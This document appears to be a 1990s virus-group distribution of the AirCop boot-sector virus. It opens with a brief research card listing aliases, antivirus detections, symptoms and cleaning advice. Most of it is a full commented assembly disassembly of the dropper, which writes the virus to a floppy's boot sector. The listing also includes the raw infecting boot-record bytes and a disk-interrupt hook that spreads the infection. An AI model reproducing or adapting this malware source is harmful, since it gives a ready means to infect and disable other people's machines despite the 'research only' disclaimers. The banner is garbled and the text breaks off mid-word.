ллллллл л л ллллллллл л лллллллл л л л л л ллл лл л л л л л л лл ллллллллллл л л л л л л л л л л л л л л л л л л лллллл ллллллллл л ллл ллл лллл ллллллл лллл лллллллл л л л ллллллл л ллл л л л л л л лл л лл л л л л л л л лллл л л лл л л л л ллллл л л лллллллл л лл лллллллл лл л л л л л л л л л ллллллл л л лллллллл л л лл ллллллл Distributed By Amateur Virus Creation & Research Group (AVCR) ФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФ Research of the Air Cop Virus by Security Threat Name of Virus: Air Cop ----------------------------------------------------------------------------- Alias: Air Dropper ----------------------------------------------------------------------------- Type Of Code: Not Informed ----------------------------------------------------------------------------- VSUM Information - Resident boot ----------------------------------------------------------------------------- Antivirus Detection: (1) ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus (2) Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper (3) McAfee Softwares Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus (4) MicroSoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper ----------------------------------------------------------------------------- Execution Results: It is a resident boot virus and it installs itself into C:\ giving you an error saying "Non-system disk please replace and hit enter" ----------------------------------------------------------------------------- Cleaning Recommendations: Cleaning is impossible but to rid your machine of the virus a boot off of a boot disk is needed and if drive C: can be acessed it must be reformatted. ----------------------------------------------------------------------------- Researcher's Notes: Reads "STACK!" many times over and gives a warning line then states that the virus is written by RABID development Corp. ----------------------------------------------------------------------------- Disassembly of the AirCop Virus ----------------------------------------------------------------------------- PAGE 59,132 ;========================================================================== ;== == ;== AIRCOP == ;== == ;== Created: 11-Jan-91 == ;== Version: == ;== Passes: 5 Analysis Options on: ABFMNOPU == ;== == ;== == ;========================================================================== movseg macro reg16, unused, Imm16 ; Fixup for Assembler ifidn , db 0BBh endif ifidn , db 0B9h endif ifidn , db 0BAh endif ifidn , db 0BEh endif ifidn , db 0BFh endif ifidn , db 0BDh endif ifidn , db 0BCh endif ifidn , db 0BBH endif ifidn , db 0B9H endif ifidn , db 0BAH endif ifidn , db 0BEH endif ifidn , db 0BFH endif ifidn , db 0BDH endif ifidn , db 0BCH endif dw seg Imm16 endm keybd_q_head EQU 1AH ; (0040:001A=2CH) keybd_q_tail EQU 1CH ; (0040:001C=2CH) SEG_A SEGMENT BYTE PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h AIRCOP PROC FAR START: MOV AX,CS MOV DS,AX MOV SP,3B6H MOV AH,0 MOV AL,3 INT 10H ; Video display ah=functn 00h ; set display mode in al MOV DX,52BH MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,3C3H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,4E5H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,464H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,480H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV AX,40H MOV ES,AX PUSH WORD PTR ES:keybd_q_tail ; (0040:001C=2CH) POP WORD PTR ES:keybd_q_head ; (0040:001A=2CH) MOV AX,CS MOV ES,AX MOV AH,8 INT 21H ; DOS Services ah=function 08h ; get keybd char al, no echo MOV CX,3 LOCLOOP_1: PUSH CX MOV AX,201H MOV BX,5D0H MOV CX,1 MOV DX,0 INT 13H ; Disk dl=drive a ah=func 02h ; read sectors to memory es:bx POP CX JNC LOC_2 ; Jump if carry=0 LOOP LOCLOOP_1 ; Loop if cx > 0 MOV DX,4F2H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV AX,4CFFH INT 21H ; DOS Services ah=function 4Ch ; terminate with al=return code LOC_2: MOV CX,3 LOCLOOP_3: PUSH CX MOV AX,301H MOV BX,5D0H MOV CX,2709H MOV DX,100H INT 13H ; Disk dl=drive a ah=func 03h ; write sectors from mem es:bx POP CX JNC LOC_4 ; Jump if carry=0 LOOP LOCLOOP_3 ; Loop if cx > 0 MOV DX,50EH MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV AX,4CFFH INT 21H ; DOS Services ah=function 4Ch ; terminate with al=return code LOC_4: MOV CX,3 LOCLOOP_5: PUSH CX MOV AX,301H MOV BX,7D0H MOV CX,1 MOV DX,0 INT 13H ; Disk dl=drive a ah=func 03h ; write sectors from mem es:bx POP CX ;* JNC LOC_6 ;*Jump if carry=0 DB 73H, 0EH LOOP LOCLOOP_5 ; Loop if cx > 0 MOV DX,57CH MOV AH,9 DATA_1 DD 0FFB821CDH DATA_2 DD 0BA21CD4CH DB 0E5H, 04H,0B4H, 09H,0CDH, 21H DB 0BAH, 9EH, 05H,0B4H, 09H,0CDH DB 21H,0B8H, 00H, 4CH,0CDH DB 21H DATA_3 DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 0DH, 0AH, 'Attention: This virus ' DB 'sample uses only in research tea' DB 'ms.', 0DH, 0AH, ' Plea' DB 'se do not use in joking or setti' DB 'ng trap on someone.', 0DH, 0AH, 0DH DB 0AH, 'Warning! This file installs' DB ' "$' DB '" into your 360K disk!', 0DH, 0AH DB 0DH, 0AH DB 7 DATA_6 DB '$' DB 'Put a 360K (Blank Formatted) dis' DB 'k into drive A:', 0DH, 0AH, 'Str' DB 'ike any key to install, or CTRL-' DB 'BREAK to quit.', 0DH, 0AH, '$' DB 'Aircop Virus$' DB 'Cannot read boot record.', 0DH, 0AH DB 07H, 24H DATA_10 DB 'Cannot write boot record.', 0DH, 0AH DB 7, '$' DATA_11 DB 'AIRCOP Test Version: Property of' DB ' The RABID Nat', 27H, 'nl Develo' DB 'pment Corp. ', 27H, '91', 0DH, 0AH DB ' $' DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 'Ca' DB 'nnot write virus boot record', 0DH DB 0AH DB 7 DB '$' DB ' was installed into this 360K di' DB 'sk. BE CAREFUL!', 0DH, 0AH, '$' DB 512 DUP (0) DB 0EBH DB '4', 90H, 'IBM 3.3' DB 00H, 02H, 02H, 01H, 00H, 02H DB 70H, 00H,0D0H, 02H,0FDH, 02H DB 00H, 09H, 00H, 02H, 00H DB 19 DUP (0) DB 12H, 00H, 00H, 00H, 00H, 01H DB 00H,0FAH, 33H,0C0H, 8EH,0D8H DB 8EH,0D0H,0BBH, 00H, 7CH, 8BH DB 0E3H, 1EH, 53H,0FFH, 0EH, 13H DB 04H,0CDH, 12H,0B1H, 06H,0D3H DB 0E0H, 8EH,0C0H, 87H, 06H, 4EH DB 00H,0A3H,0ABH, 7DH,0B8H, 28H DB 01H, 87H, 06H, 4CH, 00H,0A3H DB 0A9H, 7DH, 8CH,0C0H, 87H, 06H DB 66H, 00H,0A3H,0AFH, 7DH,0B8H DB 0BBH, 00H, 87H, 06H, 64H, 00H DB 0A3H,0ADH, 7DH, 33H,0FFH, 8BH DB 0F3H,0B9H, 00H, 01H,0FCH,0F3H DB 0A5H,0FBH, 06H,0B8H, 85H, 00H DB 50H,0CBH, 53H, 32H,0D2H,0E8H DB 70H, 00H, 5BH, 1EH, 07H,0B4H DB 02H,0B6H, 01H,0E8H, 8AH, 00H DB 72H, 10H, 0EH, 1FH,0BEH, 0BH DB 00H,0BFH, 0BH, 7CH,0B9H, 2BH DB 00H,0FCH,0F3H,0A6H, 74H, 07H LOC_7: POP BX POP AX PUSH CS MOV AX,0AFH PUSH AX LOC_RET_8: RETF ; Return far LOC_9: PUSH CS POP DS MOV SI,1DBH CALL SUB_1 ; (08AA) XOR AH,AH ; Zero register INT 16H ; Keyboard i/o ah=function 00h ; get keybd char in al, ah=scan XOR AX,AX ; Zero register INT 13H ; Disk dl=drive a ah=func 00h ; reset disk, al=return status PUSH CS POP ES MOV BX,20DH MOV CX,6 XOR DX,DX ; Zero register MOV AX,201H INT 13H ; Disk dl=drive a ah=func 02h ; read sectors to memory es:bx JC LOC_9 ; Jump if carry Set MOV CX,0FF0H MOV DS,CX JMP CS:DATA_2 ; (97DC:01AD=0CD4CH) AIRCOP ENDP ;========================================================================== ; SUBROUTINE ;========================================================================== SUB_1 PROC NEAR LOC_10: MOV BX,7 CLD ; Clear direction LODSB ; String [si] to al OR AL,AL ; Zero ? JZ LOC_RET_14 ; Jump if zero JNS LOC_11 ; Jump if not sign XOR AL,0D7H OR BL,88H LOC_11: CMP AL,20H ; ' ' JBE LOC_12 ; Jump if below or = MOV CX,1 MOV AH,9 INT 10H ; Video display ah=functn 09h ; set char al & attrib bl @curs LOC_12: MOV AH,0EH INT 10H ; Video display ah=functn 0Eh ; write char al, teletype mode JMP SHORT LOC_10 ; (08AA) ;==== External Entry into Subroutine ====================================== SUB_2: MOV BX,200H MOV CX,2 MOV AH,CL CALL SUB_5 ; (08ED) MOV CX,2709H XOR BYTE PTR ES:[BX],0FDH JZ LOC_13 ; Jump if zero MOV CX,4F0FH LOC_13: JMP SHORT LOC_RET_14 ; (08F7) NOP ;==== External Entry into Subroutine ====================================== SUB_3: MOV AH,2 MOV BX,200H ;==== External Entry into Subroutine ====================================== SUB_4: MOV CX,1 ;==== External Entry into Subroutine ====================================== SUB_5: MOV DH,0 ;==== External Entry into Subroutine ====================================== SUB_6: MOV AL,1 ;==== External Entry into Subroutine ====================================== SUB_7: PUSHF ; Push flags CALL CS:DATA_1 ; (97DC:01A9=21CDH) LOC_RET_14: RETN SUB_1 ENDP PUSH AX PUSH BX PUSH CX PUSH DX PUSH ES PUSH DS PUSH SI PUSH DI PUSHF ; Push flags PUSH CS POP DS CMP DL,1 JA LOC_16 ; Jump if above AND AX,0FE00H JZ LOC_16 ; Jump if zero XCHG AL,CH SHL AL,1 ; Shift w/zeros fill ADD AL,DH MOV AH,9 MUL AH ; ax = reg * al ADD AX,CX SUB AL,6 CMP AX,6 JA LOC_16 ; Jump if above PUSH CS POP ES CALL SUB_3 ; (08E5) JC LOC_15 ; Jump if carry Set MOV DI,43H MOV SI,250H MOV CX,0EH STD ; Set direction flag REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di] JZ LOC_16 ; Jump if zero SUB SI,CX SUB DI,CX MOV CL,33H ; '3' REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] CALL SUB_2 ; (08CB) PUSH CX PUSH BX CALL SUB_3 ; (08E5) MOV AH,3 XOR BX,BX ; Zero register CALL SUB_4 ; (08EA) POP BX POP CX JC LOC_15 ; Jump if carry Set MOV DH,1 MOV AH,3 CALL SUB_6 ; (08EF) LOC_15: XOR AX,AX ; Zero register CALL SUB_7 ; (08F1) LOC_16: MOV AH,4 INT 1AH ; Real time clock ah=func 04h ; read date cx=year, dx=mon/day CMP DH,9 JNE LOC_17 ; Jump if not equal MOV SI,1B1H CALL SUB_1 ; (08AA) LOC_17: POPF ; Pop flags POP DI POP SI POP DS POP ES POP DX POP CX POP BX POP AX JMP CS:DATA_1 ; (97DC:01A9=21CDH) POP CX IN AL,DX ; port 100H ADD AL,DH DB 0F2H,0E6H, 00H,0F0H,0DAH,0DDH DB 20H, 83H,0BFH,0BEH,0A4H,0F7H DB 0BEH,0A4H,0F7H, 96H,0BEH,0A5H DB 0B4H,0B8H,0A7H,0DAH,0DDH, 00H DB 'IO SYSMSDOS SYS', 0DH, 0AH DB 'Non-system disk or disk error', 0DH DB 0AH DB 00H, 00H, 55H,0AAH SEG_A ENDS END START ----------------------------------------------------------------------------- This virus was written for research purposes and RABID development Corp. can in no way take responsibility for any damage done. ST